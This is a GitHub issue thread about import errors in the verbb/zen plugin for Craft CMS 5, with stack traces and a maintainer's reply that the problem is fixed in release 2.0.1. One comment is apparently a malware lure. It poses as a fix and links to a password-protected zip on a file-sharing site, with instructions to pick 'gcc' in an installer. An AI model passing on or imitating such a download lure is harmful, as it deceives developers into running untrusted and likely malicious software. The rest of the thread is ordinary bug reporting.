### ISSUE TITLE
Multiple errors in Craft v5 preview UI while trying to import

### ISSUE THREAD

**Issue by mandrasch** [verbb/zen#15]
### Describe the bug

Hey, just installed verbb/zen in a project (headless CMS, headlessMode activated) 

Export of a Section worked fine, but while importing I encounter multiple UI issues.

```
Uncaught (in promise) TypeError: Cannot read properties of undefined (reading '$container')
    at s.constructor.init (/cpresources/2646a7a7/cp.js?v=1724664303:2:740456)
    at s.constructor.constructor (/cpresources/442c3e44/garnish.js?v=1724664303:2:2989)
    at s.constructor (/cpresources/442c3e44/garnish.js?v=1724664303:2:1243)
    at new s.constructor (/cpresources/442c3e44/garnish.js?v=1724664303:2:1243)
    at s.constructor.initTabs (/cpresources/2646a7a7/cp.js?v=1724664303:2:279984)
    at Proxy.<anonymous> (ConfigureTabs.vue:73:22)
```
    
500 server error on `https://my-project.ddev.site/index.php?p=admin%2Factions%2Fzen%2Fimport%2Fget-config-preview&v=1724773082947`

![image](https://github.com/user-attachments/assets/89d3f276-f494-4d29-9eed-0a138da17c73)

```
aft\helpers\Cp::elementChipHtml(): Argument #1 ($element) must be of type craft\base\ElementInterface, null given, called in /var/www/html/storage/runtime/compiled_templates/0d/0ddfcc634015d070f16c63bd0b50fb72.php on line 62
/var/www/html/vendor/craftcms/cms/src/helpers/Cp.php:476
/var/www/html/storage/runtime/compiled_templates/0d/0ddfcc634015d070f16c63bd0b50fb72.php:62AxiosError: Request failed with status code 500 at https://my-project.ddev.site/cpresources/1a77a901/axios.js?v=1724773138:1:23147 at XMLHttpRequest.S (https://my-project.ddev.site/cpresources/1a77a901/axios.js?v=1724773138:1:23292)
```

### Steps to reproduce

1. Export section (with one entry type)
2. Import .zip

### Craft CMS version

 5.3.5

### Plugin version

2.0.0

### Multi-site?

No

### Additional context

The import worked fine though.

Thanks for investigation!

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by engram-design** [comment]
Looks like a few visual issues have crept in with Craft 5 as well. Updated for the next release. To get this early, run `composer require verbb/zen:"dev-craft-5 as 2.0.0"`.

**Comment by mandrasch** [comment]
Thanks, we're also seeing a lot of this with Craft Commerce:

```
Unable to record element action: “Getting unknown property: craft\commerce\elements\Product::promotable” /app/current/vendor/yiisoft/yii2/base/Component.php:154 {"memory":9346448}
```

![image](https://github.com/user-attachments/assets/28ead68d-4f1b-46bb-af92-437cf67b9d9e)

Strange thing: Even on days we're not using it 🤔 

Should I open a new ticket for this? (I guess yes ;-))

**Comment by engram-design** [comment]
Hmmm, a new issue might be handy, if you can also supply the full error stack trace, to assist with tracing it to where it was triggered from!

**Comment by mandrasch** [comment]
Opened https://github.com/verbb/zen/issues/17

**Comment by engram-design** [comment]
Fixed in [2.0.1](https://github.com/verbb/zen/releases/tag/2.0.1)
